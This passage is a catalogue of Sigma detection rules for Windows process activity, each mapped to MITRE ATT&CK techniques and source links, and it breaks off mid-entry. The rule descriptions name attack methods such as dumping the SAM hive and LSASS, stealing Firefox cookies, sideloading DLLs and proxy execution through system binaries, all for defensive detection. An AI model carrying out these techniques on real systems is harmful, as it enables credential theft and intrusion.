Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path

The tag is: misp-galaxy:sigma-rules="Use of Setres.exe"

Use of Setres.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10300. Table References

Links

https://twitter.com/0gtweet/status/1583356502340870144

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)

https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html

https://lolbas-project.github.io/lolbas/Binaries/Setres/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml

Permission Check Via Accesschk.EXE

Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges

The tag is: misp-galaxy:sigma-rules="Permission Check Via Accesschk.EXE"

Permission Check Via Accesschk.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 10301. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43

https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat

https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW

https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml

HackTool - SharpLDAPmonitor Execution

Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.

The tag is: misp-galaxy:sigma-rules="HackTool - SharpLDAPmonitor Execution"

Table 10302. Table References

Links

https://github.com/p0dalirius/LDAPmonitor

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml

DLL Sideloading by VMware Xfer Utility

Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL

The tag is: misp-galaxy:sigma-rules="DLL Sideloading by VMware Xfer Utility"

DLL Sideloading by VMware Xfer Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10303. Table References

Links

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml

HackTool - Covenant PowerShell Launcher

Detects suspicious command lines used in Covenant luanchers

The tag is: misp-galaxy:sigma-rules="HackTool - Covenant PowerShell Launcher"

HackTool - Covenant PowerShell Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 10304. Table References

Links

https://posts.specterops.io/covenant-v0-5-eee0507b85ba

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_covenant.yml

Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name

The tag is: misp-galaxy:sigma-rules="Sideloading Link.EXE"

Sideloading Link.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10305. Table References

Links

https://twitter.com/0gtweet/status/1560732860935729152

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml

Suspicious Script Execution From Temp Folder

Detects a suspicious script executions from temporary folder

The tag is: misp-galaxy:sigma-rules="Suspicious Script Execution From Temp Folder"

Suspicious Script Execution From Temp Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10306. Table References

Links

https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml

Base64 Encoded PowerShell Command Detected

Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string

The tag is: misp-galaxy:sigma-rules="Base64 Encoded PowerShell Command Detected"

Base64 Encoded PowerShell Command Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10307. Table References

Links

https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml

New Root Certificate Installed Via CertMgr.EXE

Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

The tag is: misp-galaxy:sigma-rules="New Root Certificate Installed Via CertMgr.EXE"

New Root Certificate Installed Via CertMgr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 10308. Table References

Links

https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml

Sysinternals PsService Execution

Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering

The tag is: misp-galaxy:sigma-rules="Sysinternals PsService Execution"

Sysinternals PsService Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10309. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/psservice

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml

New Firewall Rule Added Via Netsh.EXE

Detects the addition of a new rule to the Windows firewall via netsh

The tag is: misp-galaxy:sigma-rules="New Firewall Rule Added Via Netsh.EXE"

New Firewall Rule Added Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10310. Table References

Links

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml

Suspicious Download from Office Domain

Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents

The tag is: misp-galaxy:sigma-rules="Suspicious Download from Office Domain"

Suspicious Download from Office Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608" with estimative-language:likelihood-probability="almost-certain"

Table 10311. Table References

Links

https://twitter.com/mrd0x/status/1475085452784844803?s=12

https://twitter.com/an0n_r0/status/1474698356635193346?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml

PsExec/PAExec Escalation to LOCAL SYSTEM

Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights

The tag is: misp-galaxy:sigma-rules="PsExec/PAExec Escalation to LOCAL SYSTEM"

PsExec/PAExec Escalation to LOCAL SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 10312. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.poweradmin.com/paexec/

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml

Run PowerShell Script from Redirected Input Stream

Detects PowerShell script execution via input stream redirect

The tag is: misp-galaxy:sigma-rules="Run PowerShell Script from Redirected Input Stream"

Run PowerShell Script from Redirected Input Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10313. Table References

Links

https://twitter.com/Moriarty_Meng/status/984380793383370752

https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml

Lolbin Defaultpack.exe Use As Proxy

Detect usage of the "defaultpack.exe" binary as a proxy to launch other programs

The tag is: misp-galaxy:sigma-rules="Lolbin Defaultpack.exe Use As Proxy"

Lolbin Defaultpack.exe Use As Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10314. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/

https://www.echotrail.io/insights/search/defaultpack.exe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml

Suspicious UltraVNC Execution

Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)

The tag is: misp-galaxy:sigma-rules="Suspicious UltraVNC Execution"

Suspicious UltraVNC Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"

Table 10315. Table References

Links

https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html

https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml

PowerShell Script Run in AppData

Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder

The tag is: misp-galaxy:sigma-rules="PowerShell Script Run in AppData"

PowerShell Script Run in AppData has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10316. Table References

Links

https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03

https://twitter.com/JohnLaTwC/status/1082851155481288706

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml

Windows Internet Hosted WebDav Share Mount Via Net.EXE

Detects when an internet hosted webdav share is mounted using the "net.exe" utility

The tag is: misp-galaxy:sigma-rules="Windows Internet Hosted WebDav Share Mount Via Net.EXE"

Windows Internet Hosted WebDav Share Mount Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10317. Table References

Links

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml

Suspicious High IntegrityLevel Conhost Legacy Option

ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.

The tag is: misp-galaxy:sigma-rules="Suspicious High IntegrityLevel Conhost Legacy Option"

Suspicious High IntegrityLevel Conhost Legacy Option has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10318. Table References

Links

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control

https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml

Suspect Svchost Activity

It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.

The tag is: misp-galaxy:sigma-rules="Suspect Svchost Activity"

Suspect Svchost Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10319. Table References

Links

https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml

HackTool - Jlaive In-Memory Assembly Execution

Detects the use of Jlaive to execute assemblies in a copied PowerShell

The tag is: misp-galaxy:sigma-rules="HackTool - Jlaive In-Memory Assembly Execution"

HackTool - Jlaive In-Memory Assembly Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10320. Table References

Links

https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive

https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml

Suspicious WmiPrvSE Child Process

Detects suspicious and uncommon child processes of WmiPrvSE

The tag is: misp-galaxy:sigma-rules="Suspicious WmiPrvSE Child Process"

Suspicious WmiPrvSE Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10321. Table References

Links

https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/

https://twitter.com/ForensicITGuy/status/1334734244120309760

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi(aka_REvil)_Ransomware.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml

Enumeration for 3rd Party Creds From CLI

Detects processes that query known 3rd party registry keys that holds credentials via commandline

The tag is: misp-galaxy:sigma-rules="Enumeration for 3rd Party Creds From CLI"

Enumeration for 3rd Party Creds From CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

Table 10322. Table References

Links

https://github.com/HyperSine/how-does-MobaXterm-encrypt-password

https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt

https://isc.sans.edu/diary/More+Data+Exfiltration/25698

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml

Application Terminated Via Wmic.EXE

Detects calls to the "terminate" function via wmic in order to kill an application

The tag is: misp-galaxy:sigma-rules="Application Terminated Via Wmic.EXE"

Application Terminated Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10323. Table References

Links

https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/

https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml

Suspicious Diantz Alternate Data Stream Execution

Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

The tag is: misp-galaxy:sigma-rules="Suspicious Diantz Alternate Data Stream Execution"

Suspicious Diantz Alternate Data Stream Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10324. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Diantz/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml

Use NTFS Short Name in Image

Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection

The tag is: misp-galaxy:sigma-rules="Use NTFS Short Name in Image"

Use NTFS Short Name in Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10325. Table References

Links

https://twitter.com/jonasLyk/status/1555914501802921984

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN

https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml

HackTool - GMER Rootkit Detector and Remover Execution

Detects the execution GMER tool based on image and hash fields.

The tag is: misp-galaxy:sigma-rules="HackTool - GMER Rootkit Detector and Remover Execution"

Table 10326. Table References

Links

http://www.gmer.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_gmer.yml

Terminal Service Process Spawn

Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)

The tag is: misp-galaxy:sigma-rules="Terminal Service Process Spawn"

Terminal Service Process Spawn has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 10327. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml

Abused Debug Privilege by Arbitrary Parent Processes

Detection of unusual child processes by different system processes

The tag is: misp-galaxy:sigma-rules="Abused Debug Privilege by Arbitrary Parent Processes"

Abused Debug Privilege by Arbitrary Parent Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 10328. Table References

Links

https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml

Direct Autorun Keys Modification

Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.

The tag is: misp-galaxy:sigma-rules="Direct Autorun Keys Modification"

Direct Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 10329. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml

Raccine Uninstall

Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.

The tag is: misp-galaxy:sigma-rules="Raccine Uninstall"

Raccine Uninstall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10330. Table References

Links

https://github.com/Neo23x0/Raccine

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml

SQLite Firefox Profile Data DB Access

Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.

The tag is: misp-galaxy:sigma-rules="SQLite Firefox Profile Data DB Access"

SQLite Firefox Profile Data DB Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10331. Table References

Links

https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml

Rundll32 Execution With Uncommon DLL Extension

Detects the execution of rundll32 with a command line that doesn’t contain a common extension

The tag is: misp-galaxy:sigma-rules="Rundll32 Execution With Uncommon DLL Extension"

Rundll32 Execution With Uncommon DLL Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10332. Table References

Links

https://twitter.com/mrd0x/status/1481630810495139841?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml

Dumping of Sensitive Hives Via Reg.EXE

Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.

The tag is: misp-galaxy:sigma-rules="Dumping of Sensitive Hives Via Reg.EXE"

Dumping of Sensitive Hives Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 10333. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md

https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets

https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml

Remote Access Tool - AnyDesk Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - AnyDesk Execution"

Remote Access Tool - AnyDesk Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10334. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml

Suspicious SYSTEM User Process Creation

Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)

The tag is: misp-galaxy:sigma-rules="Suspicious SYSTEM User Process Creation"

Suspicious SYSTEM User Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10335. Table References

Links

Internal Research[Internal Research]

https://tools.thehacker.recipes/mimikatz/modules

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml

Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate

Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate"

Table 10337. Table References

Links

https://anydesk.com/en/changelog/windows

https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml

Execute From Alternate Data Streams

Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection

The tag is: misp-galaxy:sigma-rules="Execute From Alternate Data Streams"

Execute From Alternate Data Streams has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10338. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml

Format.com FileSystem LOLBIN

Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs

The tag is: misp-galaxy:sigma-rules="Format.com FileSystem LOLBIN"

Table 10339. Table References

Links

https://twitter.com/0gtweet/status/1477925112561209344

https://twitter.com/wdormann/status/1478011052130459653?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_format.yml

Recon Command Output Piped To Findstr.EXE

Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain.

The tag is: misp-galaxy:sigma-rules="Recon Command Output Piped To Findstr.EXE"

Recon Command Output Piped To Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 10340. Table References

Links

https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf

https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html

https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml

Sensitive File Access Via Volume Shadow Copy Backup

Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)

The tag is: misp-galaxy:sigma-rules="Sensitive File Access Via Volume Shadow Copy Backup"

Sensitive File Access Via Volume Shadow Copy Backup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10341. Table References

Links

https://twitter.com/vxunderground/status/1423336151860002816?s=20

https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml

Potential Credential Dumping Via LSASS Process Clone

Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Via LSASS Process Clone"

Potential Credential Dumping Via LSASS Process Clone has relationships with:

